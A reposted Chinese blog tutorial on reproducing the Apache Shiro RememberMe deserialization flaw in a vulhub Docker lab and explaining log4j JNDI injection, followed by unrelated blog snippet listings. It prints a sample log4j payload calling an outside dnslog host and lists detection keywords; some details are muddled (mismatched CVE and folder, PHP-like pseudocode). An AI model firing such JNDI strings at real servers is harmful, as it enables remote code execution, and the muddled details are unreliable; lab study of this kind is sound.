当前位置：首页 > news >正文

shiro反序列化和log4j

news 文章来源：https://blog.csdn.net/m0_56578216/article/details/133756601 2025/5/9 9:33:04

文章目录

安装环境
shiro漏洞验证
log4j

安装环境

进入vulhb目录下的weblogic，复现CVE-2018-2894漏洞：

cd /vulhub/shiro/CVE-2010-3863

查看docker-compose的配置文件：

cat docker-compose.yml

如图，里面有一个镜像文件的信息和服务名，以及它的端口号（后面要用）：

在这里插入图片描述

然后使用下面命令，搭建docker-compose并启动：

sudo docker-compose up -d && sudo docker-compose up -d

如图，安装成功：
在这里插入图片描述

shiro漏洞验证

原理如下：

Apache Shiro框架提供了记住我的功能（RememberMe），用户登陆成功后会生成经过加密并编码的cookie，在服务端接收cookie值后，Base64解码–>AES解密–>反序列化。攻击者只要找到AES加密的密钥，就可以构造一个恶意对象，对其进行序列化–>AES加密–>Base64编码，然后将其作为cookie的rememberMe字段发送，Shiro将rememberMe进行解密并且反序列化，最终造成反序列化漏洞。

用bp自带的浏览器打开http://10.9.75.45:8080/，随意输入用户名密码并勾选记住我
在这里插入图片描述

点击登录后抓包，发送到repeat模块，发现请求包中有rememberme字段：

在这里插入图片描述

点击send发送，响应包中有set-cookie字段，并有rememberMe=deleteMe内容，这是一个shiro反序列化漏洞的强特征，说明有极大的可能存在shiro反序列化：

在这里插入图片描述

log4j

log4j（log for Java）是Apache的一个开源项目，是一个基于Java的日志记录框架。该漏洞的主要原因是log4j在日志输出中，未对字符合法性进行严格的限制，执行了JNDI协议加载的远程恶意脚本，从而造成RCE。

它是一个RCE命令执行的漏洞,它的日志的输出如下：print函数双引号中的内容会被当做字符处理

$user=$_GET("user");
log.print(“用户$user登录失败”);

如果print函数中出现如${jndi:ldap://lof4ot.dnslog.cn/exp}的内容，就会将大括号中的内容当做命令执行

如果流量中遇到下面三个关键字，极大可能是Java的漏洞攻击：

rmi、jndi、ldap

shiro反序列化和log4j

文章目录安装环境shiro漏洞验证log4j 安装环境进入vulhb目录下的weblogic，复现CVE-2018-2894漏洞： cd /vulhub/shiro/CVE-2010-3863查看docker-compose的配置文件： cat docker-compose.yml如图，里面有一个镜像文件的信息和服…...

编程日记 2023/10/13 18:41:29

『Linux项目自动化构建工具』make/Makefile

前言如题可知,make/Makefile为在Linux下的项目自动化构建工具; 在上一篇文章『Linux - gcc / g』c程序翻译过程中讲解了C/C程序的翻译过程; 而make/Makefile即可以看成,是Makefile在使用gcc/g使在Linux环境下能够更好的高效率的进行项目构建; 在此之前首先要对make/Makefile…...

编程日记 2023/10/13 18:40:28

github提示Permission denied (publickey)，如何才能解决

当GitHub提示“Permission denied (publickey)”错误，这通常意味着您的SSH密钥没有被正确地配置。以下是一些常见的解决步骤，帮助您诊断和解决该问题： 检查是否已设置SSH密钥： 运行以下命令检查是否存在SSH密钥： bash…...

编程日记 2023/10/13 18:39:27

金x软件有限公司安全测试岗位面试

目录一、自我介绍二、你是网络空间安全专业的，那你介绍下网络空间安全这块主要学习的东西？ 三、本科专业是网络工程，在嘉兴海视嘉安智城科技有限公司实习过，你能说下干的工作吗？（没想到问的是本科实习…...

编程日记 2023/10/13 18:38:25

c语言之strlen函数使用和实现

文章目录前言一、strlen函数使用二、实现方法前言 c语言之strlen函数使用和实现一、strlen函数使用 strlen函数返回的是在字符串中的个数，但不包含字符串结束符’\0’ #include<stdio.h> #include<string.h> int main() {char str1[] "abcd…...

编程日记 2023/10/13 18:37:22

网络初识（JAVA EE）

文章目录一、网络发展史二、网络通信基础三、协议分层四、封装和分用一、网络发展史独立模式：计算机之间相互独立，每个终端都各自持有客户数据，且当处理一个业务时，按照业务流程进行网络互连：将多台计算机连接在一…...

编程日记 2023/10/13 18:36:21

kan-tts docker本地化环境安装下载docker镜像(python3.8的) registry.cn-hangzhou.aliyuncs.com/modelscope-repo/modelscope:ubuntu20.04-cuda11.8.0-py38-torch2.0.1-tf2.13.0-1.9.2 安装基础模型 pip install modelscope 安装语音模型 pip install "modelscope…...

编程日记 2023/10/13 18:35:20

Axure RP医疗在线挂号问诊原型图医院APP原形模板

医疗在线挂号问诊Axure RP原型图医院APP原形模板，是一款原创的医疗类APP，设计尺寸采用iPhone13（375*812px），原型图上加入了仿真手机壳，使得预览效果更加逼真。本套原型图主要功能有医疗常识科普、医院挂号…...

编程日记 2023/10/13 18:33:18

Vuex的基础使用存值及异步

目录一、概述 ( 1 ) 讲述 ( 2 ) 概念 ( 3 ) 作用二、取值 1. 安装 2. 菜单栏 3. 模块 4. 引用三、改值四、异步&后台请求带来的获取一、概述 ( 1 ) 讲述 Vuex 是一个专为 Vue.js 应用程序开发的状态管理模式。它采用集中式存储管理应用的所有组件的…...

编程日记 2023/10/13 18:32:17

git 重置到某次提交

情形1： 回滚到之前的某版本，且删除该版本之后的提交 1）用 git log 查看版本号（commit后的就是版本号) 2）用 git reset --hard <版本号> 命令回滚到之前某版本. 此时本地已经回滚，远程仓库还未回滚 3&…...

编程日记 2023/10/13 18:31:14

Delphi 生成包含图片的 HTML 文件并使用 Edge 浏览器打开

在 Delphi 中，可以使用以下代码生成包含图片的 HTML 文件，并使用 Edge 浏览器打开该文件。 procedure GenerateHTMLWithImageAndOpenWithEdge; varOpenDialog: TOpenDialog;HTMLFileName: string;HTMLContent: TStringList; beginOpenDialog : TOpenDi…...

编程日记 2023/10/13 18:30:12

凉鞋的 Godot 笔记 108. 第二个通识：增删改查

在这一篇，我们来学习此教程的第二个通识，即：增删改查。增删改查我们不只是一次接触到了。在最先接触的场景窗口中，我们是对 Node 进行增删改查。在文件系统窗口中，我们是对文件&文件夹进行增删改查&#xff1…...

编程日记 2023/10/13 18:29:11

AI Web3 盛会「EDGE」在港闭幕，融云国际影响力持续提升

👆点击报名「爱嗨游」线上发布会 9 月 25 日至 27 日，全球规模最大的 AI & Web3 投资盛会——EDGE 峰会在中国香港举办，融云作为战略合作伙伴与来自世界各地的企业家、投资人、学者和热门项目方一同完成了这一盛会。关注【融云全球互联网…...

编程日记 2023/10/13 18:28:10

启动Spring Boot项目

介绍启动运行Spring Boot项目打包的jar 1、使用java -jar命令启动项目 java -jar project.jar 执行效果： 使用java -jar 文件名.jar启动项目，项目在前台运行，项目运行的日志将打印在当前控制台上，若退出当前控制台&#xff0c…...

编程日记 2023/10/13 18:27:08

竞赛选题深度学习机器视觉车位识别车道线检测 - python opencv

0 前言 🔥 优质竞赛项目系列，今天要分享的是 🚩 深度学习机器视觉车位识别车道线检测该项目较为新颖，适合作为竞赛课题方向，学长非常推荐！ 🥇学长这里给一个题目综合评分(每项满分5分) …...

编程日记 2023/10/13 18:26:07

axios调用springboot项目接口获取数据简述版

简述版前端 <div idZjw> <table> <tr v-for"item in all"><td>{{item.cno}}</td><td>{{item.name}}</td><td>{{item.age}}</td><td><img :src"item.picUrl" style"height: 130px;…...

编程日记 2023/10/13 18:25:06

MPP 架构在 OLAP 数据库的运用

MPP 架构： MPP 架构的产品： Impala ClickHouse Druid Doris 很多 OLAP 引擎都采用了 MPP 架构批处理系统 - 使用场景分钟级、小时级以上的任务，目前很多大型互联网公司都大规模运行这样的系统，稳定可靠，低成本。…...

编程日记 2023/10/13 18:24:05

什么影响香港服务器的速度原因

1、服务器缓存：清理缓存即可，不同服务器方法不一，根据自身服务器系统可百度。 2、运行内存被占满：运行内存被占满就好像我们手机的运行内存一样，一旦同时运行较多的程序或软件，那么运行内存就会出现这种情…...

编程日记 2023/10/13 18:23:04

HTML复习笔记

HTML（超文本标记语言） 文章目录 HTML（超文本标记语言）1.HTML1.概念2.标签2.1双标签超链接音频标签视频标签无序列表有序列表定义列表表格合并单元格表单表单项单选框-**radio**文件上传-file多选框-checkbox 下拉菜单文本域-text…...

编程日记 2023/10/13 18:22:03

「五度情报站」网罗全量企业情报，找客户、查竞品、寻商机！

在当下严峻的市场经济环境下，准确、及时的情报信息，就如同指引企业前行的明灯，能够让企业在风起云涌的市场大潮中保持敏锐的洞察力，掌握最新的市场动态，洞悉竞争对手的一举一动，先知先动，保持竞…...

编程日记 2023/10/13 18:21:03

Ubuntu 22.04‘Temporary failure resolving‘ 解决方案

终极解决方案首先安装resolvconf sudo apt-get install resolvconf 使用 cd /etc/resolvconf/resolv.conf.d/ 进入文件夹，使用 ls 查看目录，会显示 base head tail 使用 sudo vim base 编辑base文件， 进入时为空，点击 i 添加 …...

编程日记 2023/10/13 18:20:01